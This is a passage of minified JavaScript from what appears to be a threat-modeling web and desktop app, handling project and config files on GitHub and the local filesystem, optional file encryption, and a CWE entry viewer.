Rl,n=this.SelectedFile;i.repos.getCommit({owner:this.GetRepoOfFile(n).owner,repo:this.GetRepoOfFile(n).name,ref:e.sha}).then(({data:r})=>{var c;if(1==(null===(c=r.files)||void 0===c?void 0:c.length)&&r.files[0].filename==this.SelectedFile.path){const d=JSON.parse(JSON.stringify(this.SelectedFile));d.sha=r.files[0].sha,this.OnLoadFile(d)}})}OnSave(e=!1,i=!1,n=!1){return new Promise((r,c)=>{this.ConsistencyCheck().then(d=>{var T,k;const q=(pe,Re)=>{const Fe=new Blob([Re],{type:"text/plain;charset=utf-8"}),Ne=new Date,et=pe.split("."),ut=[Ne.getFullYear(),Ne.getMonth()+1,Ne.getDate()],Ze=[Ne.getHours(),Ne.getMinutes(),Ne.getSeconds()],yt=(It,St=2)=>{let Nt=It.toString();for(;Nt.length<St;)Nt="0"+Nt;return Nt};et.splice(1,0,"_",...ut.map(It=>yt(It)),"_",...Ze.map(It=>yt(It)),"."),(0,yM.saveAs)(Fe,et.join("")),r()},Y=(pe,Re,Fe,Ne,et,ut,Ze,yt,It=null)=>{this.isLoading.add();const St=this.getFileContent(Ze,yt,It);return new Rl({auth:this.accessToken}).rest.repos.createOrUpdateFileContents({owner:Re,repo:Fe,path:Ne,message:0==et.length?"Update":et,content:O5.from(St).toString("base64"),sha:ut,committer:{name:this.UserAccount,email:this.UserEmail}}).then(({data:oi})=>{pe(oi)}).catch(oi=>{409==oi.status&&oi.message.includes("does not match")?this.messagesService.Error("messages.error.githubSHAmismatch"):this.messagesService.Error("messages.error.githubpush",oi)}).finally(()=>this.isLoading.remove())},te=!(null===(T=this.SelectedFile)||void 0===T||!T.isEncrypted);if(n&&i){this.isLoading.add();let pe=this.Config.Name;this.Project&&(pe=this.Project.Name.replace(".ttmp",".ttmc")),pe.endsWith(".ttmc")||(pe+=".ttmc"),q(pe,this.getFileContent(this.Config.ToJSON(),te)),this.isLoading.remove()}else{const pe=(null===(k=this.SelectedFile)||void 0===k?void 0:k.type)!=Es.Project||n?this.Config:this.Project;let Re="";if(n?Re=this.SelectedFile.name.replace(".ttmp",".ttmc"):this.SelectedFile?Re=this.SelectedFile.name:this.Project?Re=this.Project.Name+(this.Project.Name.endsWith(".ttmp")?"":".ttmp"):this.Config&&(Re=this.Config.Name+(this.Config.Name.endsWith(".ttmc")?"":".ttmc")),pe.Name=Re,this.SelectedFile?this.SelectedFile.source!=hn.GitHub||this.GetRepoOfFile(this.SelectedFile).isWritable?this.SelectedFile.source!=hn.Import||this.IsLoggedIn?e&&this.SelectedFile.type==Es.Config&&this.IsLoggedIn&&(n=!0):i=!0:this.IsLoggedIn?e=!0:i=!0:i=!0,n)if(this.UserMode==Wr.LoggedIn){const Fe={msg:""};Fe.newConfig={source:hn.GitHub,type:Es.Config,name:"",path:"",repoId:null,isEncrypted:te,sha:null},te&&(Fe.removePW=!1),this.dialog.open(jG,{hasBackdrop:!1,data:Fe}).afterClosed().subscribe(et=>{if(et)if(null!=Fe.newConfig){const ut=Fe.newConfig;this.selectedFile=ut,this.Project||(this.Config.Name=ut.name),Y(yt=>{ut.sha=yt.content.sha,this.addFileToAvailableFiles(ut),this.messagesService.Success("messages.success.saveConfig",ut.name),r()},this.GetRepoOfFile(ut).owner,this.GetRepoOfFile(ut).name,ut.path,Fe.msg,ut.sha,this.Config.ToJSON(),(null!=Fe.pw||te)&&!Fe.removePW,Fe.pw)}else console.log("Should this happen?");else r()})}else console.error("not logged in");else if(i)this.isLoading.add(),q(Re,this.getFileContent(pe.ToJSON(),te)),this.isLoading.remove();else{const Fe=Ne=>{this.addFileToAvailableFiles(Ne),this.SelectedFile.type==Es.Project?(this.messagesService.Success("messages.success.saveProject",this.Project.Name),this.ProjectSaved.emit(this.Project)):(this.messagesService.Success("messages.success.saveConfig",this.Config.Name),this.ConfigChanged.emit(this.Config)),setTimeout(()=>{this.Project&&(this.Project.FileChanged=!1),this.Config&&(this.Config.FileChanged=!1)},500),this.stopUnsavedChangesTimer(),r()};if([hn.GitHub,hn.Import].includes(this.SelectedFile.source)||this.UserMode==Wr.LoggedIn&&e){const Ne={msg:""};(this.SelectedFile.source==hn.Import||e)&&(Ne.newProject={name:"",source:hn.GitHub,type:this.SelectedFile.type,configFile:null,path:"",repoId:this.SelectedFile.repoId,isEncrypted:te,sha:null}),te&&(Ne.removePW=!1),this.dialog.open(jG,{hasBackdrop:!1,data:Ne}).afterClosed().subscribe(ut=>{ut?(null!=Ne.newProject&&(this.selectedFile=Ne.newProject,this.Project.Name=this.selectedFile.name),Y(yt=>{this.selectedFile.sha=yt.content.sha;const It=this.locStorage.Get(si.LAST_FILE),St=JSON.parse(It);this.compareFiles(this.SelectedFile,St)&&this.locStorage.Set(si.LAST_FILE,JSON.stringify(this.SelectedFile)),Fe(this.SelectedFile)},this.GetRepoOfFile(this.SelectedFile).owner,this.GetRepoOfFile(this.SelectedFile).name,this.SelectedFile.path,Ne.msg,this.SelectedFile.sha,pe.ToJSON(),(null!=Ne.pw||te)&&!Ne.removePW,Ne.pw)):r()})}else if(this.SelectedFile.source==hn.FileSystem){0==this.electron.ipcRenderer.listenerCount("SaveFileCallback")&&this.electron.ipcRenderer.on("SaveFileCallback",(et,ut)=>{this.zone.run(()=>{ut?(e&&(this.selectedFile={source:hn.FileSystem,type:this.SelectedFile.type,path:ut,name:this.GetFileName(ut),isEncrypted:this.SelectedFile.isEncrypted},this.Project.Name=this.GetFileName(ut)),Fe(this.SelectedFile)):c()}),this.electron.ipcRenderer.removeAllListeners("SaveFileCallback"),this.isLoading.remove()}),this.isLoading.add();const Ne=this.getFileContent(pe.ToJSON(),te);this.electron.ipcRenderer.send(e?"SaveFileAs":"SaveFile",this.SelectedFile.path,Ne)}}}})})}OnCloseApp(e){var i,n;if((null===(i=this.Project)||void 0===i?void 0:i.FileChanged)||(null===(n=this.Config)||void 0===n?void 0:n.FileChanged))return this.zone.run(()=>{this.OnCloseFile().then(()=>{this.electron.isElectron&&this.electron.ipcRenderer.send("OnCloseApp")})}),e.returnValue=!1,!1}DeleteFile(e){if(this.isLoading.add(),e.source==hn.GitHub)new Rl({auth:this.accessToken}).rest.repos.deleteFile({owner:this.GetRepoOfFile(e).owner,repo:this.GetRepoOfFile(e).name,path:e.path,message:"Delete file "+e.name,sha:e.sha,committer:{name:this.UserAccount,email:this.UserEmail}}).then(({})=>{this.messagesService.Success("messages.success.githubdelete",e.name),e==this.SelectedFile&&(this.selectedFile=null,this.Project=null,this.Config=Wu.DefaultFile()),this.removeFileFromAvailableFiles(e)}).catch(n=>{this.messagesService.Error("messages.error.githubdelete",n),console.error(n)}).finally(()=>this.isLoading.remove());else if(e.source==hn.FileSystem){const i={title:this.translate.instant("dialog.delete.deleteItem")+" "+name,textContent:this.translate.instant("dialog.delete.sure"),resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!1};this.dialog.open(_M,{hasBackdrop:!0,data:i}).afterClosed().subscribe(r=>{r&&(this.removeFileFromAvailableFiles(e),this.electron.isElectron&&this.electron.ipcRenderer.send("DeleteFile",e.path)),this.isLoading.remove()})}}RemoveFSFile(e){this.removeFileFromAvailableFiles(e)}ExchangeConfig(e){this.exchangeConfigDialog().subscribe(i=>{i&&new Rl({auth:this.accessToken}).repos.getContent({owner:this.GetRepoOfFile(e).owner,repo:this.GetRepoOfFile(e).name,path:e.path}).then(({data:r})=>{let c=JSON.parse(O5.from(r.content,"base64").toString()),d=JSON.parse(c.content);this.fileUpdate.UpdateConfigFile(d);let T=this.Project.ToJSON();T.config=d,this.Project=mf.FromJSON(T),this.messagesService.Info("messages.info.exchangeConfig")}).catch(r=>{this.closeFile(),this.messagesService.Error("messages.error.githubfetch",r)}).finally(()=>{this.isLoading.remove()})})}ExchangeConfigWithDefault(){this.exchangeConfigDialog().subscribe(e=>{if(e){let i=Wu.DefaultFile().ToJSON();this.fileUpdate.UpdateConfigFile(i);let n=this.Project.ToJSON();n.config=i,this.Project=mf.FromJSON(n),this.messagesService.Info("messages.info.exchangeConfig")}})}OnTransferProjectDetails(){this.dialog.open(COe)}GetGHProjectHistory(){return new Promise((e,i)=>{let n=[];if(this.SelectedFile){const r=this.UserMode==Wr.LoggedIn?new Rl({auth:this.accessToken}):new Rl,c=this.SelectedFile;r.repos.listCommits({owner:this.GetRepoOfFile(c).owner,repo:this.GetRepoOfFile(c).name,path:c.path}).then(({data:d})=>{d.forEach(T=>{n.push({commiter:T.commit.committer.name,message:T.commit.message,date:T.commit.committer.date,sha:T.sha})}),e(n)}).catch(()=>i())}else e(n)})}OnCloseFile(){return new Promise((e,i)=>{var n,r,c;if((null===(n=this.Project)||void 0===n?void 0:n.FileChanged)||(null===(r=this.Config)||void 0===r?void 0:r.FileChanged)){let d={title:this.translate.instant("dialog.unsaved.title"),textContent:this.translate.instant(null!==(c=this.Project)&&void 0!==c&&c.FileChanged?"dialog.unsaved.saveProject":"dialog.unsaved.saveConfig"),resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!0};this.dialog.open(_M,{hasBackdrop:!1,data:d}).afterClosed().subscribe(k=>{k?this.OnSave().then(()=>{this.closeFile(),e()}).catch(()=>i()):(this.closeFile(),e())})}else this.closeFile(),e()})}ConsistencyCheck(){return new Promise(e=>{if(this.Project){const i=this.Project.ConsistencyCheck(this.translate);if(i.length>0){let n=this.translate.instant("dialog.consistencycheck.desc")+":\n\n";n+=i.join("\n");let r={title:this.translate.instant("dialog.consistencycheck.title"),textContent:n,resultTrueText:this.translate.instant("general.OK"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!1};this.dialog.open(_M,{hasBackdrop:!1,data:r}).afterClosed().subscribe(d=>e(!1))}else e(!0)}else e(!0)})}ManualConsistencyCheck(){this.ConsistencyCheck().then(e=>{e&&this.messagesService.Success("messages.success.ConsistencyCheck")})}SetPassword(e){this.SelectedFile&&(this.SelectedFile.isEncrypted=!0,this.fileContentCrypto=new y5(e))}RemovePassword(){this.SelectedFile&&(this.SelectedFile.isEncrypted=!1)}OpenRepo(e){window.open(this.GetRepoOfFile(e).url,"_blank")}GetRepoOfFile(e){return this.Repos.find(i=>i.id==e.repoId)}GetFileName(e){return e.substring(e.lastIndexOf(gG.sep)+1)}GetFilePath(e){return e.substring(0,e.lastIndexOf(gG.sep))}Debug(){console.log(this.Project),console.log(this.Config);let e=[],i=[];this.Config.GetAttackVectors().forEach(r=>{var c,d;r.OriginTypes.includes(Nm.Weakness)&&(null===(c=r.Weakness)||void 0===c?void 0:c.CWEID)&&e.push(r.Weakness.CWEID),r.OriginTypes.includes(Nm.AttackTechnique)&&(null===(d=r.AttackTechnique)||void 0===d?void 0:d.CAPECID)&&i.push(r.AttackTechnique.CAPECID)}),e.sort((r,c)=>r-c),i.sort((r,c)=>r-c);let n=["Supported CWEs:",e,"Supported CAPECs:",i,"Threat Categories: ",this.Config.GetThreatCategories().length.toString()];n.push("Threats: ",this.Config.GetAttackVectors().length.toString(),"Threat Rules: ",this.Config.GetThreatRules().length.toString()),this.Config.GetThreatQuestions().length.toString(),console.log(n)}Debug2(){if(!this.Project)return;let e=this.Project.ToJSON();delete e.config;let i=JSON.stringify(e,null,2);const n=this.clipboard.beginCopy(i);let r=3;const c=()=>{!n.copy()&&--r?setTimeout(c):n.destroy()};return c(),i}Debug3(){let e=JSON.stringify(this.Config.ToJSON(),null,2);const i=this.clipboard.beginCopy(e);let n=3;const r=()=>{!i.copy()&&--n?setTimeout(r):i.destroy()};return r(),e}checkAppVersionUpdate(){const e=this.locStorage.Get(si.CURRENT_VERSION);if(e&&uf_i!=e){if(this.isNewVersion(uf_i,"0.4.18")&&!this.isNewVersion(e,"0.4.18")){this.locStorage.Remove(si.LAST_FILE);const i=this.locStorage.Get(si.FILE_HISTORY);if(i){const n=JSON.parse(i),r=[];n.forEach(c=>{const d=c.split(":"),T="FS"==d[0]?hn.FileSystem:hn.GitHub,k={path:d[1],name:this.GetFileName(d[1]),source:T,type:Es.Project,isEncrypted:null};T==hn.GitHub&&(k.repoId=Number(d[0])),r.push(k)}),this.locStorage.Set(si.FILE_HISTORY,JSON.stringify(r))}}setTimeout(()=>{this.messagesService.Info(Gi.Format(this.translate.instant("messages.info.versionUpdate"),uf_i))},5e3)}this.locStorage.Set(si.CURRENT_VERSION,uf_i)}getFileContent(e,i,n=null){this.isLoading.add(),this.SelectedFile&&(this.SelectedFile.isEncrypted=i);const r={content:JSON.stringify(e)};if(i){n&&(this.fileContentCrypto=new y5(n));let d=JSON.parse(JSON.stringify(r));r.content=this.fileContentCrypto.Encrypt(JSON.stringify(d.content)),r.encrypted=this.fileContentCrypto.Encrypt(this.fileContentCrypto.GetRandom(16).toString("base64"))}const c=JSON.stringify(r);return this.isLoading.remove(),c}exchangeConfigDialog(){let e={title:this.translate.instant("dialog.configexchange.title"),textContent:this.translate.instant("dialog.configexchange.desc"),resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!1};return this.dialog.open(_M,{hasBackdrop:!1,data:e}).afterClosed()}closeFile(){this.Project=null,this.Config=null,this.selectedFile=null,this.locStorage.Remove(si.LAST_FILE),this.Config=Wu.DefaultFile(),this.Config.FileChanged=!1,this.router.navigate(["/"])}addFileToAvailableFiles(e){if(e){this.AvailableFiles.some(n=>this.compareFiles(n,e))||this.availableFiles.splice(0,0,e);const i=this.getLastFileHistory();this.availableFiles=this.availableFiles.sort((n,r)=>{var c,d;if(n.source==hn.GitHub&&(null===(c=this.GetRepoOfFile(n))||void 0===c||!c.isWritable))return 1;if(r.source==hn.GitHub&&(null===(d=this.GetRepoOfFile(r))||void 0===d||!d.isWritable))return-1;let T=i.findIndex(q=>this.compareFiles(q,n)),k=i.findIndex(q=>this.compareFiles(q,r));return T>=0||k>=0?(-1==T&&(T=Number.MAX_VALUE),-1==k&&(k=Number.MAX_VALUE),T<k?-1:1):void 0})}}removeFileFromAvailableFiles(e){this.removeFileFromHistory(e);const i=this.AvailableFiles.findIndex(n=>this.compareFiles(n,e));i>=0&&this.availableFiles.splice(i,1)}addFileToHistory(e){if(e&&(this.KeepUserSignedIn||e.source==hn.FileSystem)){const i=this.getLastFileHistory(),n=i.findIndex(r=>this.compareFiles(r,e));n>=0&&i.splice(n,1),i.splice(0,0,e),this.locStorage.Set(si.FILE_HISTORY,JSON.stringify(i)),this.locStorage.Set(si.LAST_FILE,JSON.stringify(e)),this.addFileToAvailableFiles(e)}}removeFileFromHistory(e){if(e&&e.path){const i=this.getLastFileHistory(),n=i.findIndex(c=>this.compareFiles(c,e));n>=0&&i.splice(n,1),this.locStorage.Set(si.FILE_HISTORY,JSON.stringify(i));const r=JSON.parse(this.locStorage.Get(si.LAST_FILE));r&&this.SelectedFile&&r.source==hn.GitHub&&this.compareFiles(r,this.SelectedFile)&&this.locStorage.Remove(si.LAST_FILE)}}getLastFileHistory(){const e=this.locStorage.Get(si.FILE_HISTORY);return e?JSON.parse(e):[]}clearLoginData(){this.locStorage.Remove(si.AUTH_ACCESS_TOKEN),this.locStorage.Remove(si.AUTH_LAST_CODE),this.locStorage.Remove(si.GH_ACCOUNT_NAME),this.locStorage.Remove(si.GH_USER_NAME),this.locStorage.Remove(si.GH_USER_URL),this.userMode=Wr.None,this.userAccount=this.userName=this.accessToken=this.userURL=""}retrieveUser(){if(this.accessToken&&this.accessToken.length>0){this.isLoading.add();const e=new Rl({auth:this.accessToken});e.request("GET /user").then(({data:i})=>{const n=()=>{this.KeepUserSignedIn&&(this.locStorage.Set(si.GH_ACCOUNT_NAME,this.userAccount),this.locStorage.Set(si.GH_USER_NAME,this.userName),this.locStorage.Set(si.GH_USER_URL,this.userURL),this.locStorage.Set(si.GH_USER_EMAIL,this.userEmail)),this.retrieveRepositories(),this.router.navigate(["/home"])};this.userAccount=i.login,this.userName=i.name,this.userURL=i.html_url,this.userEmail=i.email,this.UserEmail?n():e.users.listEmailsForAuthenticatedUser().then(({data:r})=>{this.userEmail=r.find(c=>c.primary).email,n()}).catch(r=>this.messagesService.Error("messages.error.githubfetch",r)).finally(()=>this.isLoading.remove())}).catch(i=>{this.messagesService.Error("messages.error.githubfetch",i)}).finally(()=>this.isLoading.remove())}}retrieveRepositories(){this.repos=[];const e=(n,r,c,d,T)=>{this.addFileToAvailableFiles({repoId:r,name:c,path:d,sha:T,isEncrypted:!1,source:hn.GitHub,type:n});const q=this.locStorage.Get(si.LAST_FILE);if(!this.blockLoading&&this.KeepUserSignedIn&&q){const Y=JSON.parse(q),te=this.AvailableFiles.find(pe=>pe.source==hn.GitHub&&this.compareFiles(pe,Y));te&&(this.blockLoading=!0,this.messagesService.Info(Gi.Format(this.translate.instant("messages.info.loadFile"),te.name)),this.OnLoadFile(te),setTimeout(()=>{this.blockLoading=!1},5e3))}};this.getExampleRepository().finally(()=>{const n=r=>{this.repos.forEach(c=>{this.isLoading.add(),r.repos.getContent({owner:c.owner,repo:c.name,path:""}).then(({data:d})=>{d.some(T=>"projects"==T.name&&"dir"==T.type)&&(this.isLoading.add(),r.repos.getContent({owner:c.owner,repo:c.name,path:"projects"}).then(({data:T})=>{T.filter(k=>k.name.endsWith(".ttmp")).forEach(k=>{e(Es.Project,c.id,k.name,k.path,k.sha)})}).finally(()=>{this.isLoading.remove()})),d.some(T=>"configs"==T.name&&"dir"==T.type)&&(this.isLoading.add(),r.repos.getContent({owner:c.owner,repo:c.name,path:"configs"}).then(({data:T})=>{T.filter(k=>k.name.endsWith(".ttmc")).forEach(k=>{e(Es.Config,c.id,k.name,k.path,k.sha)})}).finally(()=>{this.isLoading.remove()}))}).finally(()=>{this.isLoading.remove()})})};if(this.UserMode==Wr.LoggedIn){const r=new Rl({auth:this.accessToken});this.isLoading.add(),r.repos.listForAuthenticatedUser().then(({data:c})=>{c.forEach(d=>{let T={id:d.id,name:d.name,owner:d.owner.login,url:d.html_url,updated:new Date(d.updated_at),private:d.private,isWritable:!0};this.repos.push(T)}),n(r)}).finally(()=>{this.isLoading.remove()})}else n(new Rl)})}getExampleRepository(){this.isLoading.add();const e=new Rl,i="SecSimon",n="TTM-examples",r=e.repos.get({owner:i,repo:n});return r.then(c=>{let T={id:c.data.id,name:n,owner:i,url:c.data.html_url,updated:new Date(c.data.updated_at),private:c.data.private,isWritable:!1};this.repos.push(T)}).catch(c=>{this.messagesService.Error(c.message)}).finally(()=>{this.isLoading.remove()}),r}restoreUserAccount(){this.accessToken=this.locStorage.Get(si.AUTH_ACCESS_TOKEN),Gi.NullOrEmpty(this.accessToken)||(this.userMode=Wr.LoggedIn),this.userName=this.locStorage.Get(si.GH_USER_NAME),this.userAccount=this.locStorage.Get(si.GH_ACCOUNT_NAME),this.userURL=this.locStorage.Get(si.GH_USER_URL),this.userEmail=this.locStorage.Get(si.GH_USER_EMAIL),this.UserMode==Wr.LoggedIn&&setTimeout(()=>{this.messagesService.Success("messages.success.welcomeBack",Gi.EmptyIfNull(this.UserDisplayName))},500)}compareFiles(e,i){return e.source==i.source&&e.name==i.name&&e.path==i.path&&e.repoId==i.repoId}isNewVersion(e,i){const n=i.replace("v","").split("."),r=e.replace("v","").split(".");if(n.length==r.length)for(let c=0;c<n.length;c++){if(Number(r[c])>Number(n[c]))return!0;if(Number(r[c])<Number(n[c]))break}return!1}startUnsavedChangesTimer(){null==this.unsavedChangesTimer&&(this.unsavedChangesMinutes=0,this.unsavedChangesTimer=setInterval(()=>{this.unsavedChangesMinutes++,this.unsavedChangesMinutes%5==0&&this.messagesService.ShowUnsavedChanges&&(this.messagesService.UnsavedChanges(Gi.Format(this.translate.instant("messages.warning.unsavedChanges"),this.unsavedChangesMinutes.toString())),this.ConsistencyCheck())},6e4))}stopUnsavedChangesTimer(){this.unsavedChangesTimer&&(clearInterval(this.unsavedChangesTimer),this.unsavedChangesTimer=null)}}return t.\u0275fac=function(e){return new(e||t)(At(_r),At($G),At(op),At(Oo),At(hz),At(vu),At(A2),At(Sn),At(D5),At(qi),At(ST))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function bOe(t,a){if(1&t&&(m(0,"mat-form-field",6),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),it(6,"textarea",7),s(7,"\n  "),u()),2&t){const e=B(2);C(3),ke(re(4,3,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCWEProperty("ExtendedDescription"))}}function MOe(t,a){if(1&t&&(bt(0),s(1,"\n        "),m(2,"tr"),s(3,"\n          "),m(4,"td",12),s(5),u(),s(6,"\n          "),m(7,"td"),s(8,"Technical Impact: "),m(9,"em"),s(10),u()(),s(11,"\n        "),u(),s(12,"\n        "),m(13,"tr")(14,"td"),s(15),u()(),s(16,"\n      "),Mt()),2&t){const e=a.$implicit,i=B(3);C(5),ke(i.GetValues(e.Scope,!1)),C(5),ke(i.GetValues(e.Impact,!0)),C(5),ke(i.GetValues(e.Note,!1))}}function vOe(t,a){if(1&t&&(bt(0),s(1,"\n    "),m(2,"table"),s(3,"\n      "),m(4,"tr",10)(5,"th"),s(6,"Scope"),u(),m(7,"th"),s(8,"Impact"),u()(),s(9,"\n      "),ne(10,MOe,17,3,"ng-container",11),s(11,"\n    "),u(),s(12,"\n  "),Mt()),2&t){const e=B(2);C(10),V("ngForOf",e.GetCWEConsequences())}}function AOe(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n  "),m(2,"mat-form-field",2),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),it(8,"input",3),s(9,"\n  "),u(),s(10,"\n  "),m(11,"mat-form-field",4),s(12,"\n    "),m(13,"mat-label"),s(14),oe(15,"translate"),u(),s(16,"\n    "),it(17,"input",3),s(18,"\n  "),u(),s(19,"\n  "),m(20,"button",5),he("click",function(){return be(e),Me(B().OpenCWE())}),oe(21,"translate"),s(22,"\n    "),m(23,"mat-icon"),s(24,"open_in_new"),u(),s(25,"\n  "),u(),s(26,"\n  "),m(27,"mat-form-field",6),s(28,"\n    "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n    "),it(33,"textarea",7),s(34,"\n  "),u(),s(35,"\n  "),ne(36,bOe,8,5,"mat-form-field",8),s(37,"\n  "),ne(38,vOe,13,1,"ng-container",9),s(39,"\n"),u()}if(2&t){const e=B();C(5),ke(re(6,12,"properties.CWETitle")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCWETitle()),C(6),ke(re(15,14,"properties.likelihoodOfExploit")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCWEProperty("Likelihood_Of_Exploit")),C(3),at("matTooltip",re(21,16,"general.openInNew")),C(10),ke(re(31,18,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCWEProperty("Description")),C(3),V("ngIf",e.GetCWEProperty("ExtendedDescription")),C(2),V("ngIf",e.GetCWEConsequences()&&e.GetCWEConsequences().length>0)}}let N5=(()=>{class t{constructor(e){this.dataService=e}ngOnInit(){this.cweID||console.error("Unset cweID")}OpenCWE(){window.open(t.GetURL(this.cweID),"_blank")}GetCWETitle(){return this.GetCWEEntry()?"CWE-"+Op[this.cweID].attr["@_ID"]+": "+Op[this.cweID].attr["@_Name"]+" ("+Op[this.cweID].attr["@_Status"]+")":null}GetCWEProperty(e){return this.GetCWEEntry()?this.GetCWEEntry()[e]?this.GetCWEEntry()[e]:"":null}GetCWEEntry(){return Op[this.cweID]}GetCWEConsequences(){return this.GetCWEEntry()&&Op[this.cweID].Common_Consequences?Array.isArray(Op[this.cweID].Common_Consequences.Consequence)?Op[this.cweID].Common_Consequences.Consequence:[Op[this.cweID].Common_Consequences.Consequence]:null}GetValues(e,i){return Array.isArray(e)?e.join(i?"; ":"\n"):e}static GetURL(e){return"https://cwe.mitre.org/data/definitions/"+e.toString()+".html"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-cwe-entry"]],inputs:{cweID:"cweID"},decls:1,vars:1,consts:[["style","pointer-events: none;",4,"ngIf"],[2,"pointer-events","none"],["appearance","fill",2,"width","calc(100% - 250px)","margin-right","5px"],["matInput","","type","text",3,"spellcheck","value"],["appearance","fill",2,"width","200px","margin-right","5px"],["mat-icon-button","","matTooltipShowDelay","1000",2,"vertical-align","super","pointer-events","all",3,"matTooltip","click"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","cdkTextareaAutosize","",3,"spellcheck","value"],["appearance","fill","style","width: 100%;",4,"ngIf"],[4,"ngIf"],[2,"text-align","left"],[4,"ngFor","ngForOf"],["rowSpan","2",2,"vertical-align","top"]],template:function(e,i){1&e&&ne(0,AOe,40,20,"div",0),2&e&&V("ngIf",i.cweID)},dependencies:[Zi,Ri,oa,da,nn,un,Go,Xa,Pa,Xi]}),t})(),ff=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[{provide:dm,deps:[yT],useFactory:a=>a.Locale},{provide:q1,useClass:JRe},{provide:zq,useValue:axe}],imports:[rn,Ms,iw,z4,ux,iH,Gq,sH,cH,Iq,Vq,fz,Aw,xw,_W,Hy,ib,VW,zW,BW,jW,up,QW,s8,SF,l8,OF,BF,aA,XF,o8,h8,p8,aV,u8,yV,_8,y8,AV,xV,kV,zV,bW,Od,WV,VV,ZV,tB,iB,bu,iw,z4,ux,iH,sH,cH,Iq,Vq,fz,Aw,xw,_W,Hy,ib,VW,zW,BW,jW,up,QW,s8,SF,l8,OF,BF,aA,XF,o8,h8,p8,aV,u8,yV,_8,y8,AV,xV,kV,zV,bW,Od,WV,VV,ZV,tB,iB,bu]}),t})();Ds(w5,[Zi,Ri,an,Ta,Ea,oa,da,nn,un,jr,qh,V1,Mu,Uh,Go,Xa,ts,is,Or,Lr,rc,Pa,Mg,il,Ec,Dc,tl,wl,gp,WG,R5,qG],[Xi,E5]),Ds(HG,[Ri,an,Ta,Ea,oa,da,nn,un,jr,Xa,xl,Pa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,Cp,al,bp,x8,I5],[Xi,T5]),Ds(I5,[Zi,Ri,an,Ac,Ta,Ea,oa,da,nn,un,Go,Xa,Pa,il,Ec,Dc,tl,wl,N5],[Xi,T5]),Ds(R5,[nn,Xa,jp],[Xi]);var V$={prefix:"fas",iconName:"left-right",icon:[512,512,[8596,"arrows-alt-h"],"f337","M504.3 273.6c4.9-4.5 7.7-10.9 7.7-17.6s-2.8-13-7.7-17.6l-112-104c-7-6.5-17.2-8.2-25.9-4.4s-14.4 12.5-14.4 22l0 56-192 0 0-56c0-9.5-5.7-18.2-14.4-22s-18.9-2.1-25.9 4.4l-112 104C2.8 243 0 249.3 0 256s2.8 13 7.7 17.6l112 104c7 6.5 17.2 8.2 25.9 4.4s14.4-12.5 14.4-22l0-56 192 0 0 56c0 9.5 5.7 18.2 14.4 22s18.9 2.1 25.9-4.4l112-104z"]},Z5={prefix:"fas",iconName:"code-branch",icon:[448,512,[],"f126","M80 104c13.3 0 24-10.7 24-24s-10.7-24-24-24S56 66.7 56 80s10.7 24 24 24zm80-24c0 32.8-19.7 61-48 73.3v87.8c18.8-10.9 40.7-17.1 64-17.1h96c35.3 0 64-28.7 64-64v-6.7C307.7 141 288 112.8 288 80c0-44.2 35.8-80 80-80s80 35.8 80 80c0 32.8-19.7 61-48 73.3V160c0 70.7-57.3 128-128 128H176c-35.3 0-64 28.7-64 64v6.7c28.3 12.3 48 40.5 48 73.3c0 44.2-35.8 80-80 80s-80-35.8-80-80c0-32.8 19.7-61 48-73.3V352 153.3C19.7 141 0 112.8 0 80C0 35.8 35.8 0 80 0s80 35.8 80 80zm232 0c0-13.3-10.7-24-24-24s-24 10.7-24 24s10.7 24 24 24s24-10.7 24-24zM80 456c13.3 0 24-10.7 24-24s-10.7-24-24-24s-24 10.7-24 24s10.7 24 24 24z"]},XX={prefix:"fas",iconName:"right-long",icon:[512,512,["long-arrow-alt-right"],"f30b","M334.5 414c8.8 3.8 19 2 26-4.6l144-136c4.8-4.5 7.5-10.8 7.5-17.4s-2.7-12.9-7.5-17.4l-144-136c-7-6.6-17.2-8.4-26-4.6s-14.5 12.5-14.5 22l0 88L32 208c-17.7 0-32 14.3-32 32l0 32c0 17.7 14.3 32 32 32l288 0 0 88c0 9.6 5.7 18.2 14.5 22z"]};function Qst(t,a){if(1&t&&(bt(0),m(1,"mat-icon",8),s(2,"check_circle"),u(),s(3),Mt()),2&t){const e=B();C(3),ke(e.messagesService.SuccessMsgs.length)}}function $st(t,a){if(1&t&&(bt(0),m(1,"mat-icon",8),s(2,"info"),u(),s(3),Mt()),2&t){const e=B();C(3),ke(e.messagesService.InfoMsgs.length)}}function Kst(t,a){if(1&t){const e=Ye();m(0,"button",14),he("click",function(){return be(e),Me(B(2).dialogService.OpenPasswordProtectionDialog())}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon",2),s(4,"lock"),u(),s(5," \n    "),u()}2&t&&at("matTooltip",re(1,1,"status-bar.passwordProtectionOn"))}function Xst(t,a){if(1&t){const e=Ye();m(0,"button",16),he("click",function(){return be(e),Me(B(2).dialogService.OpenPasswordProtectionDialog())}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon",2),s(4,"lock_open_right"),u(),s(5," \n    "),u()}if(2&t){const 